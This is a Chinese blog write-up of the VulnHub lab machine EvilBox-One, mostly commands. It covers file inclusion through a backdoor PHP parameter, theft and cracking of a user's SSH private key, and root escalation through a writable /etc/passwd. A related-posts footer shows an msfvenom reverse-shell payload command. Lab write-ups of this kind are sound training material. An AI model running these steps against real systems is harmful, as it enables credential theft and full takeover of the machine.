靶机练习NO.25 EvilBox 递归目录枚举出后门 猜测后门为文件包含 wfuzz出参数,包含.ssh/id_rsa私钥 john破解ssh私钥/etc/passwd有写入权限提权openssl

最新推荐文章于 2024-03-19 09:41:15 发布
最新推荐文章于 2024-03-19 09:41:15 发布
阅读量894 收藏
点赞数
分类专栏: 靶机学习 文章标签: python 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/123329525
版权

0x00 靶机介绍

  • 下载地址

    https://www.vulnhub.com/entry/evilbox-one,736/

  • 环境配置
    Virtualbox 启动 usb设备1.0 网卡与kali同网卡

0x01 信息收集

步骤一:ip探测

在这里插入图片描述

步骤二:端口服务识别

oot@kali:~/baji/vulnhub/EvilBOx# nmap -sC -sV -A -p- 192.168.56.116 -o port.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-07 14:28 CST
Nmap scan report for 192.168.56.116
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:7D:E3:62 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.56.116

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.73 seconds

开放 22 80 端口
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2
80/tcp open http Apache httpd 2.4.38 ((Debian))

默认 apache配置页面 可以目录爆破

步骤三:目录爆破

在这里插入图片描述
[14:30:04] 200 - 12B - /robots.txt
[14:30:04] 200 - 4B - /secret/
[14:30:05] 301 - 317B - /secret -> http://192.168.56.116/secret/

可以在枚举 secret目录

python3 dirsearch.py   -u "http://192.168.56.116/secret" -e "*"

在这里插入图片描述

0x02 漏洞挖掘

步骤一:查看/secret/evil.php 页面

在这里插入图片描述
没有数据
evil 为邪恶的 有毒的 大概就是后门的意思
所以 可能是 代码执行 命令执行 文件包含 等后门
wfuzz 枚举

步骤二:wfuzz枚举后门参数

猜测为文件包含后门(成功)

wfuzz FUZZ为要fuzz的参数 后边直接加上/etc/passwd
grep -v 排除 0 Ch 的内容

wfuzz -c -w /root/zidian/fuzzDicts-master/paramDict/php.txt -u http://192.168.56.116/secret/evil.php?FUZZ=/etc/passwd | grep -v "0 Ch"

在这里插入图片描述

步骤三:查看/etc/passwd文件

在这里插入图片描述
存在mowree 可以登录
想办法登录进去
去看看有没有 ssh公钥

步骤四:查看.ssh/id_rsa私钥文件

在这里插入图片描述

步骤五:利用私钥登录

(1)直接登录 发现需要密码

chmod  600 ./id_rsa
ssh mowree@192.168.56.116 -i ./id_rsa

在这里插入图片描述

需要爆破私钥登录的密码

(2) 将私钥保存到本地

curl wget http://192.168.7.100/secret/evil.php?command=/home/mowree/.ssh/id_rsa >> id_rsa

在这里插入图片描述

(3)用 ssh2john 将id_rsa秘钥信息转换为john可以识别的信息

python3 /usr/share/john/ssh2john.py id_rsa >crack.txt

在这里插入图片描述

(4)john爆破


获取到一个unicorn 密码

(4)ssh私钥登录(成功)

ssh mowree@192.168.56.116 -i ./id_rsa
unicorn
在这里插入图片描述

拿到第一个flag
在这里插入图片描述

56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

0x03 提权

步骤一 :找可利用点(passwd有写入权限)

翻文件发现 ls -al /etc/passwd 有写入权限
在这里插入图片描述

直接写入 root权限的用户即可

步骤二:openssl 生成密码

mowree@EvilBoxOne:~$ openssl passwd -1 123456
$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/

步骤三:将生成的密码拼接到root中

mowree@EvilBoxOne:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash

可以将 root 任意改一个名字 比如 kaifa
x 改为生成的密码

即为

kaifa:$1$Nu2rm2O8$GpQ5CebG16r7RbLNmFQdO/:0:0:root:/root:/bin/bash

步骤三:写入到/etc/passwd文件中

vi /etc/passwd  写入
cat /etc/passwd  查看是否写入成功

在这里插入图片描述

步骤四:su切换kaifa账户

su kaifa
123456
切换root权限成功

在这里插入图片描述

0x04 总结

本次靶机通过
1.目录枚举 (注意需要收集字典) 出目录再枚举 出一个后门文件evil.php

2.通过猜测后门类型 +wfuzz wfuzz出参数 command

3.只有文件包含 想要getshell

1. 配合文件上传
2. 远程文件包含getshell
3. 想思路比如(看看有什么账号,该账号有没有ssh私钥 .ssh/id_rsa)
去包含一下看看 有的话 下载到本地 可以用私钥登录,有密码的话 爆破私钥登录密码。
  1. 登录后 提权 内核漏洞 失败, suid 没找到 sudo 也没有
    翻翻文件 发现 /etc/passwd 任意用户组都有可以写入权限
    openssl生成密码 写入一个root用户权限的账号 直接su 账号 获取root权限
LuckyCharm~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
John密码破解 ---- linux用户密码
u011070772的专栏
01-18 1696
John 密码破解 ---- linux简单用户密码 简单密码比较容易破解,复杂密码基本就别考虑john,太慢,john只使用单颗CPU进行运算    实验步骤:             2种方法下载软件  在windows中下载后,用软件WinScp传到linux 某目录中 或 命令:wget  http://www.openwall.com/john/g/john-1.7.9
靶机练习No.19 VulnHub靶机 Red-1目录后门wfuzz 枚举参数,filter协议读取数据库源码,hashcat解密 time .c后门反弹shell
YouthBelief的博客
01-14 1981
0x00 环境准备 下载地址: https://www.vulnhub.com/entry/red-1,753/ virtual box 导入靶机 难度:中 靶机上架时间:2021年11月3日 示:Red has taken over your system, are you able to regain control? 红色已经控制了你的系统,你能重新控制吗? 0x01 信息收集 靶机ip探测 端口服务识别 扫开放 22和80端口, 80端口wordpress 5.8
文件包含漏洞结合ssh登录日志getshell
weixin_54813510的博客
06-26 600
文件包含(漏洞)是程序开发人员通常于灵活性的考虑,会将被包含文件设置成变量,然后动态调用这些文件。但正是因为调用的灵活性导致用户可能调用一些恶意文件,造成文件包含漏洞。文件包含漏洞分为本地文件包含漏洞和远程文件包含漏洞。php中文件包含的函数有:require(),找不到被包含文件时会产生致命错误,并停止脚本运行。include(),找不到被包含文件时只会产生警告,脚本将继续运行。include_once()与include()类似,唯一区别是如果该文件中的代码已经被包含,则不会再次包含
apache_openssl漏洞的利用及权限
ncnynl的专栏
09-07 2159
apache_openssl漏洞的利用及权限升--nightcat转载请保持文章完整第一部分:获得shell.在packetstorm玩了一段时间,遇到有openssl-too-open.tar.gz这个exploit.现在看看软件包的描述:OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers whi
爆破root密码hash John the Ripper和hydra爆破ssh密码
dengyu7227的专栏
03-30 1325
官方网站:http://www.openwall.com/john/ 下载:wgethttp://www.openwall.com/john/j/john-1.8.0.tar.gz 解压:tar -xvf john-1.8.0.tar.gz 进入src目录: cdjohn-1.8.0 && cd src [java]view plainco...
使用John the ripper破解弱密码
qq_61861243的博客
10-04 1397
使用John the ripper破解弱密码
Prinme1--OpenSSL解密渗透
weixin_58815063的博客
08-28 172
其实我们可以去查看系统版本,如果版本较低,很大可能存在内核漏洞可以利用。但我们并没有走这条路,因为内核漏洞相对于动作较多要暴力很多,容易被管理员发现并且容易导致服务器瘫痪。我们发现初始权限账号目录的时候发现一个enc目录,因为enc是openssl解密的一个命令,于是想到两者的相关性。
openssl passwd 手动生成密码
weixin_33736048的博客
07-15 869
引言:在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中,并且是以加密的方式存放的,根据加密方式的不同,所产生的加密后的密码的位数也不同。openssl passwd的作用是用来计算密码hash的,目的是为了防止密码以明文的形式现。语法格式: openssl...
红队打靶:Prime1详细打靶思路之OpenSSL解密(vulnhub)
Bossfrank的博客
06-16 672
本文使用openssl渗透解密的方法对vulnhub中靶机prime1的初始立足点进行,涉及知识点包括find命令寻找备份、md5哈希生成、OpenSSL加解密的参数设定、bash脚本的编写等。
红队笔记6-Prime1打靶流程--OpenSSL解密(vulnhub)
最新发布
qq_63442530的博客
03-19 1167
本篇文章是根据靶场作者给通过openssl解密获得saket用户密码,在saket用户sudo -l成功,没有使用内核,也是作者想让我们学习openssl解密:1.enc运行密码的查找:find 找备份文件->缺少密码时可以通过查找备份文件可能存有密码2.密的处理:我们获得密,对其进行md5加密(md5sum)和16进制转换(od)3.openssl解密参数构造:查看openssl帮助文档,确定参数
fuzzDicts-master字典
04-13
fuzzDicts-master字典不多介绍,懂得都懂0.0.。。
fuzzDicts:Web Pentesting Fuzz字典,一个就够了
04-01
模糊度 Web Pentesting Fuzz字典,一个就够了。 日志 不定期更新,使用前建议git pull一下,同步更新。 分享字典建议直接交PR 20201202: 在目录字典下更新了一个师傅给的管理员目录变种。 20200510: 用户名字典下添加了一个百家姓top3000的拼音,去重后188条,攻击!!! 20200420: 合并一个由交的pr,测试常用手机号码top300 +,放在用户名字典里面,可以测试时可以试试;添加一份团队儿童师傅供的某集团的弱密码字典。 20200410: 添加了centos和aix的/ etc /目录,放在ssrfDict里面,aix和其他系统区别还是蛮大的,实战一下RFI注意区别。 20200406: 合并一个由交的pr,密码top19576。 20200410: 新增centOS和AIX主机的/ etc /目录文件列表,放在s
github字典文件_fuzzDicts.zip
02-13
这个文件是从GitHub上面保存下来的,没做任何修改。适用于密码爆破。如果有需要的也可以百度fzzdicts关键字去GitHub下载最新版。这里供个备份,需要的下载即可。
john 破解Linux登录密码
SheXinK’s Blog
12-12 2660
john 破解Linux登录密码1、 测试环境2、 john 破解登录密码   Linux密码信息分别保存在 /etc/passwd和/etc/shadow 文件中,在渗透中,可利用john破解Linux登录密码。当然,也是基于强大的密码字典 1、 测试环境   Kali 2、 john 破解登录密码 unshadow /etc/passwd /etc/shadow >pass.txt ...
linux思路
weixin_68210863的博客
11-01 831
分享九种linux思路
WFUZZ使用教程
weixin_45116657的博客
10-22 1677
WFUZZ使用教程
最不详细的Wfuzz使用(一)o((>ω< ))o
weixin_45059752的博客
01-07 8535
目录前言一、Wfuzz到底是个啥玩意儿?二、安装1.安装1.2 相关链接三、基本使用3.1 目录遍历3.2 Post数据爆破3.3 头部爆破3.4 测试HTTP请求方法(Method)3.5 使用代理3.6 认证3.7 归测试3.8 并发和间隔3.9 保存测试结果三、总结 前言 这是我第一次写博客,每次学完东西,再用的时候就感觉忽悠忽无,可能是我太笨了吧(●’◡’●),最近才学完Wfuzz。记录一下。加油(ง •_•)ง————2022/1/7。 一、Wfuzz到底是个啥玩意儿? Wfuzz 是一款P.
WEB渗透WFUZZ攻击使用介绍
墨痕诉清风的博客
08-07 601
kali自带集成Wfuzz是为了促进Web应用程序评估中的任务而创建的,它基于一个简单的概念:它用给定有效Payload的值替换对FUZZ关键字的任何引用。Wfuzz中的有效载荷是数据源。这个简单的概念允许在HTTP请求的任何字段中注入任何输入,从而允许在不同的Web应用程序组件中执行复杂的Web安全攻击,例如:参数、身份验证、表单、目录/文件、标头等。Wfuzz不仅仅是一个网页内容扫描器:Wfuzz可以帮助您通过查找和利用Web应用程序漏洞来保护您的Web应用程序。
红队渗透靶场之prime1.0(超详细!)
xf555er的博客
01-03 1296
WordPress是一个免费的开源内容管理系统(CMS),可以用来创建和管理网站或博客。它是由PHP语言和MySQL数据库构建的,并且拥有大量的插件和主题,可以让您轻松地自定义网站的外观和功能。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe这个IP是靶机IP还是虚拟机ip
05-27
假设你的攻击机器 IP 地址为 192.168.1.100,你想要在靶机上运行一个反向 TCP Meterpreter,那么你可以使用以下命令生成 Payload 文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值